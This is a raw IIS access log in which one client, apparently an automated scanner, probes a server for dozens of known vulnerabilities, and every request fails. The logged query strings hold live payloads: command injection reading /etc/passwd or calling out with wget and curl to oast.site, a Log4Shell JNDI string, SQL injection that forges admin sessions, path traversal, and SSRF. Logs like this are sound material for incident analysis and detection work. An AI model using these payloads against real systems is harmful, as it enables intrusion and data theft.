2023-08-04 19:45:13 103.153.214.94 POST /pages/templates2/viewpagetemplate.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 83
2023-08-04 19:45:23 103.153.214.94 POST /pages/createpage-entervariables.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 99
2023-08-04 19:45:32 103.153.214.94 POST /template/custom/content-editor - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 78
2023-08-04 19:45:41 103.153.214.94 POST /templates/editor-preload-container - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 79
2023-08-04 19:45:48 103.153.214.94 POST /users/user-dark-features - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 81
2023-08-04 19:49:42 103.153.214.94 GET /web_shell_cmd.gch - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 99
2023-08-04 19:56:21 103.153.214.94 POST /webmail/basic/ - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 80
2023-08-04 20:06:23 103.153.214.94 GET /linuxki/experimental/vis/kivis.php type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 336
2023-08-04 20:12:22 103.153.214.94 POST /apisix/batch-requests - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 126
2023-08-04 20:12:26 103.153.214.94 GET /api/2TSGVn7d6hMcrlF7nphkUC676Fb - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 66
2023-08-04 20:16:34 103.153.214.94 GET /q start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o&ylabel&xrange=10:10&yrange=[33:system(%27wget%20http://cj5gsq24749fn87ofdl01obekzpt9eiq5.oast.site%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 58
2023-08-04 20:27:27 103.153.214.94 GET /opc/v1/instance - 8172 - 111.90.143.37 - - 404 7 0 60
2023-08-04 20:27:32 103.153.214.94 GET /opc/v1/instance - 8172 - 111.90.143.37 - - 404 7 0 83
2023-08-04 20:28:31 103.153.214.94 POST /rest/tinymce/1/macro/preview - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 bcvt.kontum.gov.vn:8172 404 7 0 96
2023-08-04 20:38:59 103.153.214.94 GET /tests/support/stores/test_grid_filter.php query=echo%20md5%28%22CVE-2020-19625%22%29%3B 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 84
2023-08-04 20:39:06 103.153.214.94 GET /ucmdb-api/connect - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 59
2023-08-04 20:44:00 103.153.214.94 GET /cgi-bin/admin.cgi Command=sysCommand&Cmd=ping${IFS}-c${IFS}1${IFS}cj5gsq24749fn87ofdl0iw1ftx6o1o1f1.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 63
2023-08-04 20:51:28 103.153.214.94 GET /api/scrape/kube-system - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 91
2023-08-04 20:54:08 103.153.214.94 POST /admin/uploads.php id=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 67
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-08-04 21:01:16
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-08-04 21:01:16 103.153.214.94 GET /wp-admin/admin-ajax.php action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 58
2023-08-04 21:01:25 103.153.214.94 GET /wp-content/plugins/easy-digital-downloads/readme.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 81
2023-08-04 21:07:37 103.153.214.94 GET /_search a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-768%7D$%7B%3A-276%7D.$%7BhostName%7D.search.cj5gsq24749fn87ofdl0gz6fzqke8zh6d.oast.site%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 85
2023-08-04 21:14:42 103.153.214.94 PUT /fileserver/2TSGVlebqbzdsJRWbIuSPxPmN1R.txt - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 89
2023-08-04 21:14:46 103.153.214.94 GET /fileserver/2TSGVlebqbzdsJRWbIuSPxPmN1R.txt - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 95
2023-08-04 21:18:12 103.153.214.94 GET /webui/file_guest path=/var/www/documentation/../../../../../etc/passwd&flags=1152 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 90
2023-08-04 21:20:08 103.153.214.94 GET /admin/ajax/pages.php id=(sleep(6)) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 59
2023-08-04 21:26:31 103.153.214.94 POST /human.aspx Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272TSGVona3jRu62DTNC0UVc9gBdM%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+IpAddress=%27111.90.143.37%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272TSGVona3jRu62DTNC0UVc9gBdM%27%23 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79
2023-08-04 21:32:23 103.153.214.94 POST /upload/UploadResourcePic.ashx ResourceID=8382 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 81
2023-08-04 21:37:56 103.153.214.94 GET /horde/admin/user.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 83
2023-08-04 21:38:01 103.153.214.94 GET /admin/user.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 72
2023-08-04 21:38:07 103.153.214.94 GET / rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 56
2023-08-04 21:43:02 103.153.214.94 GET /plus/ajax_street.php act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 60
2023-08-04 21:50:20 103.153.214.94 GET / lang=../../thinkphp/base 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 57
2023-08-04 21:50:28 103.153.214.94 GET / lang=../../../../../vendor/topthink/think-trace/src/TraceDebug 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 74
2023-08-04 21:51:47 103.153.214.94 GET /db_dump.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user_add.php 404 7 0 86
2023-08-04 21:54:12 103.153.214.94 GET /mainfile.php username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 61
2023-08-04 21:54:31 103.153.214.94 GET /js/hrm/getdata.jsp cmd=getSelectAllId&sql=select+547653*865674+as+id 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 55
2023-08-04 21:55:12 103.153.214.94 POST /api/system/sessions - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 83
2023-08-04 22:06:03 103.153.214.94 POST /service/extdirect - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 84
2023-08-04 22:06:14 103.153.214.94 POST /RPC2_Login - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 96
2023-08-04 22:06:33 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 62
2023-08-04 22:07:21 103.153.214.94 GET /ajax/networking/get_netcfg.php iface=;curl%20cj5gsq24749fn87ofdl0b15nr587967j7.oast.site/`whoami`; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 82
2023-08-04 22:11:00 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 84
2023-08-04 22:19:01 103.153.214.94 GET /logfile d=crossdomain.xml 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 61
2023-08-04 22:19:36 103.153.214.94 POST /ztp/cgi-bin/handler - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 75
2023-08-04 22:26:17 103.153.214.94 GET /console/images/%2e%2e%2fconsole.portal _nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cj5gsq24749fn87ofdl0qzgdc5684tmr8.oast.site') 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 400 0 0 96
2023-08-04 22:31:02 103.153.214.94 POST /invoker/JMXInvokerServlet/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 64
2023-08-04 22:31:08 103.153.214.94 POST /invoker/EJBInvokerServlet/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 57
2023-08-04 22:31:16 103.153.214.94 POST /invoker/readonly - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 56
2023-08-04 22:32:55 103.153.214.94 GET /service/error/sfdc_preauth.jsp session=s&userid=1&server=http://cj5gsq24749fn87ofdl07poj1bhd8kkng.oast.site%23.salesforce.com/ 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 74
2023-08-04 22:37:25 103.153.214.94 POST /ajax.php action=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 55
2023-08-04 22:37:35 103.153.214.94 GET /index.php page=home 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 71
2023-08-04 22:40:58 103.153.214.94 GET /wp-login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 84
2023-08-04 22:41:07 103.153.214.94 GET /wp-json/wp/v2/users/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 93
2023-08-04 22:41:15 103.153.214.94 GET / rest_route=/wp/v2/users 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60
2023-08-04 22:41:23 103.153.214.94 GET /feed/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 88
2023-08-04 22:41:32 103.153.214.94 GET /author-sitemap.xml - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 55
2023-08-04 22:43:46 103.153.214.94 GET /api/v1/repos/search limit=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 116
2023-08-04 22:47:26 103.153.214.94 POST /context.json - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 105
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-08-04 23:00:55
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-08-04 23:00:55 103.153.214.94 GET /downloader.php file=%3Becho+CVE-2023-23333|rev%00.zip 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 80
2023-08-04 23:03:33 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 56
2023-08-04 23:06:06 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 83
2023-08-04 23:06:15 103.153.214.94 GET /wp-admin/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 78
2023-08-04 23:11:19 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 85
2023-08-04 23:11:28 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 58
2023-08-04 23:14:49 103.153.214.94 POST /login/userverify.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login/login.htm 404 7 0 99
2023-08-04 23:21:39 103.153.214.94 POST /dashboard/proc.php type=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 97
2023-08-04 23:28:12 103.153.214.94 POST /var - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 86
2023-08-04 23:33:04 103.153.214.94 POST /auth/check - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 84
2023-08-04 23:34:42 103.153.214.94 POST /CTCWebService/CTCWebServiceBean/ConfigServlet - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 125
2023-08-04 23:36:46 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 113
2023-08-04 23:37:06 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 127